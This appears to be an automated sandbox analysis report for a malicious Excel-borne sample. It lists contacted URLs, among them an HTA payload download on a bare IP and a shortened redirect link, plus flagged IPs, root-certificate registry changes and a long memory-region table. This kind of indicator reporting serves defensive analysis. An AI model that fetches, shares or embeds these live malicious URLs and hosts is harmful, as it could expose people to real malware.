http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta...v
unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htaha
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htapV
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://qrisni.me/pV
unknown
https://secure.comodo.com/CPS0
unknown
https://qrisni.me/8qnMUw?&italian=tough&bladder=wrathful&singer=juvenile&tugboat=nebulous&poignance=purple&twig=mature&constant=many&set=frightened&section
188.114.97.3
https://qrisni.me/4
unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htahttp://192.3.176.141/4
unknown
http://192.3.176.141/vider
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://qrisni.me/8qnMUw?&italian=tough&bladder=wrathful&singer=juvenile&tugboat=nebulous&poignance=
unknown
There are 34 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
qrisni.me
188.114.97.3
drive.google.com
142.250.186.46
drive.usercontent.google.com
142.250.185.97

IPs

IP
Domain
Country
Malicious
192.3.176.141
unknown
United States
malicious
94.156.177.220
unknown
Bulgaria
malicious
142.250.186.46
drive.google.com
United States
188.114.97.3
qrisni.me
European Union
188.114.96.3
unknown
European Union
142.250.185.97
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
-/0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2A766
2A766
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
q80
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34B71
34B71
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34C6B
34C6B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35225
35225
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34C6B
34C6B
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 80 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
443000
heap
page read and write
1FD7000
direct allocation
page read and write
1FE3000
direct allocation
page read and write
574000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
14F000
heap
page read and write
4FCB000
heap
page read and write
38F000
direct allocation
page read and write
4596000
heap
page read and write
3CAF000
stack
page read and write
5C4000
heap
page read and write
462B000
heap
page read and write
4FA2000
heap
page read and write
58C2000
heap
page read and write
50BB000
heap
page read and write
45BF000
heap
page read and write
37E0000
heap
page read and write
1C1C0000
heap
page read and write
54B000
heap
page read and write
4F99000
heap
page read and write
4AA9000
heap
page read and write
2DD000
heap
page read and write
50D0000
trusted library allocation
page read and write
5571000
heap
page read and write
10000
heap
page read and write
1CB4000
heap
page read and write
33DE000
trusted library allocation
page read and write
50CA000
heap
page read and write
472A000
heap
page read and write
4A3E000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
4F53000
heap
page read and write
1F50000
heap
page read and write
50CA000
heap
page read and write
3EE0000
trusted library allocation
page read and write
17C000
heap
page read and write
45F1000
heap
page read and write
346000
heap
page read and write
463F000
heap
page read and write
3D8000
heap
page read and write
2F4000
heap
page read and write
58C3000
heap
page read and write
292C000
trusted library allocation
page read and write
3430000
direct allocation
page read and write
4AA9000
heap
page read and write
1FF000
heap
page read and write
1A848000
stack
page read and write
5808000
heap
page read and write
16F000
trusted library allocation
page read and write
417000
heap
page read and write
1CA3F000
stack
page read and write
1C8000
heap
page read and write
5F0000
heap
page read and write
5971000
heap
page read and write
1A748000
heap
page execute and read and write
7FE89B20000
trusted library allocation
page read and write
390000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
4614000
heap
page read and write
4624000
heap
page read and write
1AF6000
heap
page read and write
5390000
heap
page read and write
2680000
trusted library allocation
page execute read
53EE000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
3740000
trusted library allocation
page execute
396000
heap
page read and write
4596000
heap
page read and write
462D000
heap
page read and write
1A0000
heap
page read and write
4F1F000
heap
page read and write
300000
heap
page read and write
7FE8988D000
trusted library allocation
page execute and read and write
4FCB000
heap
page read and write
385000
heap
page read and write
29F000
heap
page read and write
12071000
trusted library allocation
page read and write
26C4000
heap
page read and write
1A994000
heap
page read and write
39C0000
trusted library allocation
page read and write
390000
heap
page read and write
3B0B000
stack
page read and write
7FE89A90000
trusted library allocation
page read and write
566C000
heap
page read and write
4545000
heap
page read and write
269000
heap
page read and write
2071000
trusted library allocation
page read and write
5FB000
heap
page read and write
450C000
heap
page read and write
123000
heap
page read and write
50CE000
heap
page read and write
3560000
heap
page read and write
1C1D6000
heap
page read and write
5937000
heap
page read and write
20000
heap
page read and write
5C0000
heap
page read and write
1AA8E000
stack
page read and write
2612000
trusted library allocation
page read and write
E3000
heap
page read and write
4FCC000
heap
page read and write
10000
heap
page read and write
3E5000
heap
page read and write
3EA000
heap
page read and write
595C000
heap
page read and write
4735000
heap
page read and write
2DD000
heap
page read and write
37B4000
heap
page read and write
7FE8995C000
trusted library allocation
page execute and read and write
3490000
remote allocation
page read and write
3058000
trusted library allocation
page read and write
40E0000
trusted library allocation
page read and write
311000
heap
page read and write
1BB6000
heap
page read and write
281000
heap
page read and write
34B5000
trusted library allocation
page read and write
2F0000
heap
page read and write
1C5DC000
stack
page read and write
4A3E000
trusted library allocation
page read and write
2752000
trusted library allocation
page read and write
3E6000
heap
page read and write
37D000
heap
page read and write
1CAAE000
stack
page read and write
2B9000
heap
page read and write
3E9000
heap
page read and write
4558000
heap
page read and write
4A90000
heap
page read and write
2D8000
heap
page read and write
351000
heap
page read and write
3443000
direct allocation
page read and write
286000
heap
page read and write
406F000
trusted library allocation
page read and write
273000
stack
page read and write
510000
heap
page read and write
39F0000
trusted library allocation
page read and write
4F4000
heap
page read and write
1FD0000
direct allocation
page read and write
57B7000
heap
page read and write
58E000
heap
page read and write
4C4000
heap
page read and write
3B7F000
stack
page read and write
3A6000
heap
page read and write
4FCB000
heap
page read and write
44C000
heap
page read and write
2E0000
heap
page read and write
5C0000
heap
page read and write
35DA000
trusted library allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
52E000
heap
page read and write
4A3E000
trusted library allocation
page read and write
36A000
heap
page read and write
1C2BA000
heap
page read and write
7F000
heap
page read and write
3C60000
trusted library allocation
page read and write
3C30000
trusted library allocation
page read and write
36F0000
heap
page read and write
3EA000
heap
page read and write
6E31000
trusted library allocation
page read and write
2B00000
remote allocation
page read and write
1A070000
heap
page read and write
4A98000
heap
page read and write
350000
heap
page read and write
3EF000
heap
page read and write
5939000
heap
page read and write
45F3000
heap
page read and write
3C60000
trusted library allocation
page read and write
472E000
heap
page read and write
1AF000
heap
page read and write
360000
heap
page read and write
5949000
heap
page read and write
5371000
heap
page read and write
375A000
heap
page read and write
6235000
heap
page read and write
473F000
heap
page read and write
4624000
heap
page read and write
4AA9000
heap
page read and write
560000
heap
page read and write
6431000
trusted library allocation
page read and write
162000
heap
page read and write
4FD1000
heap
page read and write
1CD4000
heap
page execute and read and write
4771000
trusted library allocation
page read and write
340000
heap
page read and write
27EC000
trusted library allocation
page read and write
444000
heap
page read and write
4A9F000
heap
page read and write
575000
heap
page read and write
224000
heap
page read and write
375A000
heap
page read and write
39F000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
34A9000
trusted library allocation
page read and write
3D8000
heap
page read and write
45E7000
heap
page read and write
3CF5000
heap
page read and write
24E000
heap
page read and write
41F000
heap
page read and write
44C000
heap
page read and write
392000
heap
page read and write
579000
heap
page read and write
1C680000
heap
page read and write
40D0000
trusted library allocation
page read and write
58BE000
heap
page read and write
46D6000
heap
page read and write
45EF000
heap
page read and write
E1000
heap
page read and write
3817000
heap
page read and write
3819000
heap
page read and write
53EF000
heap
page read and write
4AAB000
heap
page read and write
1A949000
heap
page read and write
5939000
heap
page read and write
473E000
heap
page read and write
26A6000
trusted library allocation
page read and write
50D0000
trusted library allocation
page read and write
23EA000
heap
page read and write
4AA9000
heap
page read and write
1E34000
heap
page read and write
286000
heap
page read and write
35EA000
trusted library allocation
page read and write
5945000
heap
page read and write
1DB0000
heap
page execute and read and write
2E50000
trusted library allocation
page execute read
1B5F0000
heap
page read and write
1D20000
heap
page read and write
4A11000
heap
page read and write
30B0000
trusted library allocation
page execute
40D0000
trusted library allocation
page read and write
4AA6000
heap
page read and write
5939000
heap
page read and write
4A3E000
trusted library allocation
page read and write
227000
heap
page read and write
405E000
trusted library allocation
page read and write
23E6000
heap
page read and write
1B094000
heap
page read and write
70000
heap
page read and write
1C64000
heap
page read and write
574000
heap
page read and write
43B000
heap
page read and write
577000
heap
page read and write
23FA000
heap
page read and write
4FA2000
heap
page read and write
5997000
heap
page read and write
4682000
heap
page read and write
3C2000
heap
page read and write
45F7000
heap
page read and write
1D8F000
stack
page read and write
3A7000
heap
page read and write
1A143000
heap
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
504D000
heap
page read and write
400000
heap
page read and write
286000
heap
page read and write
35E5000
trusted library allocation
page read and write
306F000
trusted library allocation
page read and write
10000
heap
page read and write
4A3E000
trusted library allocation
page read and write
2A8000
heap
page read and write
39B000
heap
page read and write
37C000
heap
page read and write
3A07000
trusted library allocation
page read and write
7FE89882000
trusted library allocation
page read and write
1B645000
heap
page read and write
39FE000
trusted library allocation
page read and write
20F1000
trusted library allocation
page read and write
504E000
heap
page read and write
2F1000
stack
page read and write
425000
heap
page read and write
35ED000
trusted library allocation
page read and write
2A7000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
2C9000
heap
page read and write
313000
heap
page read and write
562000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
2C9000
heap
page read and write
3E8000
heap
page read and write
1E10000
heap
page read and write
7FE89A53000
trusted library allocation
page read and write
3B7000
heap
page read and write
5964000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
3F7000
heap
page read and write
22F0000
heap
page read and write
564000
heap
page read and write
304A000
stack
page read and write
58C2000
heap
page read and write
463D000
heap
page read and write
480E000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
4DE3000
heap
page read and write
57C5000
heap
page read and write
25AD000
trusted library allocation
page read and write
2D8000
heap
page read and write
25F000
heap
page read and write
1B38E000
stack
page read and write
7FE89AA0000
trusted library allocation
page read and write
4A3E000
trusted library allocation
page read and write
3EE000
heap
page read and write
58F5000
heap
page read and write
1BF4000
heap
page read and write
3CCA000
stack
page read and write
5409000
heap
page read and write
35ED000
trusted library allocation
page read and write
5964000
heap
page read and write
1A9FC000
stack
page read and write
4591000
heap
page read and write
3C1000
heap
page read and write
5939000
heap
page read and write
50B4000
heap
page read and write
4FCB000
heap
page read and write
53F8000
heap
page read and write
3EE000
heap
page read and write
3751000
heap
page read and write
57BF000
heap
page read and write
37B4000
heap
page read and write
31E0000
trusted library allocation
page read and write
250000
heap
page read and write
36F3000
heap
page read and write
4D4D000
heap
page read and write
45DF000
heap
page read and write
420000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
23E6000
heap
page read and write
4F9C000
heap
page read and write
3093000
trusted library allocation
page read and write
1B29B000
stack
page read and write
376F000
heap
page read and write
3C2E000
stack
page read and write
5954000
heap
page read and write
596F000
heap
page read and write
20000
heap
page read and write
4D4D000
heap
page read and write
3723000
trusted library allocation
page read and write
277000
heap
page read and write
4F1F000
heap
page read and write
5968000
heap
page read and write
375A000
heap
page read and write
234000
heap
page read and write
47A5000
heap
page read and write
56C000
heap
page read and write
25CE000
stack
page read and write
3EE000
heap
page read and write
2D8000
heap
page read and write
3821000
heap
page read and write
4552000
heap
page read and write
1A5CB000
stack
page read and write
10C000
heap
page read and write
55B000
heap
page read and write
1A2D8000
stack
page read and write
7FE89A80000
trusted library allocation
page read and write
2C9000
heap
page read and write
7FE89A82000
trusted library allocation
page read and write
3810000
trusted library allocation
page read and write
1C224000
heap
page read and write
2DD000
heap
page read and write
3EE000
heap
page read and write
193000
stack
page read and write
1A8FD000
heap
page read and write
41F000
heap
page read and write
4682000
heap
page read and write
359000
heap
page read and write
4A98000
heap
page read and write
23B1000
heap
page read and write
463F000
heap
page read and write
4FC7000
heap
page read and write
4FA4000
heap
page read and write
7FE89A33000
trusted library allocation
page read and write
2F37000
trusted library allocation
page read and write
4A8F000
heap
page read and write
45C0000
heap
page read and write
388000
heap
page read and write
4535000
heap
page read and write
1D30000
trusted library allocation
page read and write
7FE898BB000
trusted library allocation
page read and write
2B8000
heap
page read and write
5964000
heap
page read and write
33F0000
direct allocation
page read and write
53FA000
heap
page read and write
4FCB000
heap
page read and write
23FB000
heap
page read and write
3530000
heap
page read and write
463B000
heap
page read and write
370000
direct allocation
page read and write
17C000
heap
page read and write
514000
heap
page read and write
5F2000
heap
page read and write
3C30000
trusted library allocation
page read and write
1DA0000
trusted library allocation
page read and write
1C8BA000
stack
page read and write
5C0000
heap
page read and write
53FE000
heap
page read and write
1C36000
heap
page read and write
1AFFE000
stack
page read and write
3E6F000
stack
page read and write
403000
heap
page read and write
4FCD000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
23A000
heap
page read and write
57A000
heap
page read and write
4F97000
heap
page read and write
4733000
heap
page read and write
1F70000
direct allocation
page read and write
3EE000
heap
page read and write
3EE000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
37E1000
heap
page read and write
596F000
heap
page read and write
56B8000
heap
page read and write
4F1F000
heap
page read and write
35EB000
trusted library allocation
page read and write
54F0000
heap
page read and write
3CD000
heap
page read and write
597000
heap
page read and write
4A3E000
trusted library allocation
page read and write
45CD000
heap
page read and write
1CE5000
heap
page read and write
1B0D6000
heap
page read and write
300000
heap
page read and write
1A65F000
stack
page read and write
1FA000
heap
page read and write
4F95000
heap
page read and write
3816000
heap
page read and write
31DA000
stack
page read and write
5409000
heap
page read and write
2551000
trusted library allocation
page read and write
34B2000
trusted library allocation
page read and write
377000
direct allocation
page read and write
589000
heap
page read and write
5EC000
heap
page read and write
7FE89960000
trusted library allocation
page execute and read and write
23E7000
heap
page read and write
50CC000
heap
page read and write
3FB0000
trusted library allocation
page read and write
4870000
trusted library allocation
page read and write
3D10000
trusted library allocation
page read and write
1A07E000
heap
page read and write
437000
heap
page read and write
45BF000
heap
page read and write
4F0000
heap
page read and write
1F90000
direct allocation
page read and write
2186000
heap
page read and write
4733000
heap
page read and write
473D000
heap
page read and write
4E1B000
heap
page read and write
4A3E000
trusted library allocation
page read and write
57E000
heap
page read and write
40F0000
trusted library allocation
page read and write
22F1000
trusted library allocation
page read and write
1AF4E000
stack
page read and write
27DE000
trusted library allocation
page read and write
4A3E000
trusted library allocation
page read and write
5407000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
4596000
heap
page read and write
39AE000
stack
page read and write
443000
heap
page read and write
540A000
heap
page read and write
4FCC000
heap
page read and write
1E1000
heap
page read and write
20EE000
stack
page read and write | page guard
540000
heap
page read and write
2831000
trusted library allocation
page read and write
5FF000
heap
page read and write
448000
heap
page read and write
3A0000
heap
page read and write
3880000
heap
page read and write
14F000
heap
page read and write
584000
heap
page read and write
56B6000
heap
page read and write
1D56000
heap
page read and write
1E34000
heap
page read and write
388D000
stack
page read and write
7FE89B50000
trusted library allocation
page read and write
50BF000
heap
page read and write
40E8000
trusted library allocation
page read and write
45F9000
heap
page read and write
5867000
heap
page read and write
56B6000
heap
page read and write
4598000
heap
page read and write
36F3000
heap
page read and write
56AD000
heap
page read and write
3752000
heap
page read and write
5945000
heap
page read and write
4B2A000
heap
page read and write
596F000
heap
page read and write
3F1000
heap
page read and write
12100000
trusted library allocation
page read and write
3EE000
heap
page read and write
37D0000
trusted library allocation
page read and write
2F33000
trusted library allocation
page read and write
20C7000
trusted library allocation
page read and write
10000
heap
page read and write
417000
heap
page read and write
5EF000
heap
page read and write
5947000
heap
page read and write
390000
heap
page read and write
1C430000
heap
page read and write
4731000
heap
page read and write
35DF000
trusted library allocation
page read and write
24A000
heap
page read and write
35D9000
trusted library allocation
page read and write
411000
heap
page read and write
7FE8993C000
trusted library allocation
page execute and read and write
4B3F000
stack
page read and write
3C4000
heap
page read and write
27CC000
trusted library allocation
page read and write
353000
heap
page read and write
2CD5000
heap
page read and write
35EE000
trusted library allocation
page read and write
4598000
heap
page read and write
45B000
heap
page read and write
43B000
heap
page read and write
3C30000
trusted library allocation
page read and write
1C98F000
stack
page read and write
50B6000
heap
page read and write
3AD000
direct allocation
page read and write
1E0000
heap
page read and write
1B640000
heap
page read and write
3A4000
heap
page read and write
4A3E000
trusted library allocation
page read and write
1C67C000
stack
page read and write
1EE0000
heap
page read and write
7FE898B3000
trusted library allocation
page read and write
4F1C000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
567000
heap
page read and write
150000
trusted library allocation
page read and write
1B5B0000
heap
page read and write
1E40000
direct allocation
page read and write
1D1B000
heap
page read and write
C0000
heap
page read and write
32B0000
trusted library allocation
page read and write
579000
heap
page read and write
44D000
heap
page read and write
385000
heap
page read and write
5997000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
4B91000
heap
page read and write
3724000
trusted library allocation
page read and write
2CB000
heap
page read and write
37B0000
trusted library allocation
page read and write
4A3E000
trusted library allocation
page read and write
380000
heap
page read and write
23F1000
heap
page read and write
390000
heap
page read and write
376E000
heap
page read and write
26F000
heap
page read and write
33C000
heap
page read and write
1C70000
trusted library allocation
page read and write
45AF000
heap
page read and write
23F1000
heap
page read and write
130000
direct allocation
page read and write
35E7000
trusted library allocation
page read and write
2A3F000
stack
page read and write
2DD000
heap
page read and write
3B0000
heap
page read and write
480C000
heap
page read and write
5171000
trusted library allocation
page read and write
232000
stack
page read and write
1CC4000
heap
page read and write
2E2000
heap
page read and write
1C59F000
stack
page read and write
34A7000
trusted library allocation
page read and write
4ED0000
heap
page read and write
53F2000
heap
page read and write
1C6B0000
heap
page read and write
216000
heap
page read and write
35F0000
heap
page read and write
1B1000
heap
page read and write
1B48B000
stack
page read and write
3E6000
heap
page read and write
16B000
stack
page read and write
27A000
heap
page read and write
37B4000
heap
page read and write
472C000
heap
page read and write
4EC5000
heap
page read and write
4A50000
heap
page read and write
7FE89A84000
trusted library allocation
page read and write
596F000
heap
page read and write
4A3E000
trusted library allocation
page read and write
35E6000
trusted library allocation
page read and write
4598000
heap
page read and write
6239000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
2A0000
heap
page read and write
1B5AB000
heap
page read and write
112000
stack
page read and write
595C000
heap
page read and write
348000
stack
page read and write
392E000
stack
page read and write
54F0000
heap
page read and write
44FF000
stack
page read and write
403000
heap
page read and write
5953000
heap
page read and write
286000
heap
page read and write
4A3E000
trusted library allocation
page read and write
594A000
heap
page read and write
2F35000
trusted library allocation
page read and write
38B000
heap
page read and write
390000
direct allocation
page read and write
437000
heap
page read and write
5945000
heap
page read and write
3940000
heap
page read and write
5953000
heap
page read and write
85000
heap
page read and write
43B000
heap
page read and write
473D000
heap
page read and write
1C5C0000
heap
page read and write
12080000
trusted library allocation
page read and write
37DF000
stack
page read and write
2B0000
heap
page read and write
2F8000
heap
page read and write
5DC000
heap
page read and write
5999000
heap
page read and write
4F1F000
heap
page read and write
508000
heap
page read and write
4A8D000
heap
page read and write
6230000
heap
page read and write
2B8000
heap
page read and write
444000
heap
page read and write
328000
heap
page read and write
4A3E000
trusted library allocation
page read and write
179000
heap
page read and write
125000
stack
page read and write
4A3E000
trusted library allocation
page read and write
4500000
heap
page read and write
35EA000
trusted library allocation
page read and write
35D8000
trusted library allocation
page read and write
3B80000
trusted library allocation
page read and write
3E9000
heap
page read and write
595C000
heap
page read and write
463F000
heap
page read and write
4FA9000
heap
page read and write
596F000
heap
page read and write
443000
heap
page read and write
58C0000
heap
page read and write
3410000
direct allocation
page read and write
3F4000
heap
page read and write
4A3E000
trusted library allocation
page read and write
29F000
heap
page read and write
34A3000
trusted library allocation
page read and write
5945000
heap
page read and write
5949000
heap
page read and write
34B2000
trusted library allocation
page read and write
4CD000
heap
page read and write
1E3000
heap
page read and write
1B4FF000
stack
page read and write
3E7000
heap
page read and write
2A3000
heap
page read and write
1E60000
direct allocation
page read and write
1C20E000
stack
page read and write
3371000
trusted library allocation
page read and write
1C2C7000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
45F7000
heap
page read and write
4F17000
heap
page read and write
58B6000
heap
page read and write
1C1F5000
heap
page read and write
33D0000
direct allocation
page read and write
4C0000
heap
page read and write
342E000
trusted library allocation
page read and write
21B000
heap
page read and write
5409000
heap
page read and write
5408000
heap
page read and write
258000
heap
page read and write
50CE000
heap
page read and write
4C10000
heap
page read and write
4545000
heap
page read and write
1C2B0000
heap
page read and write
1A719000
stack
page read and write
4A8D000
heap
page read and write
4E1D000
heap
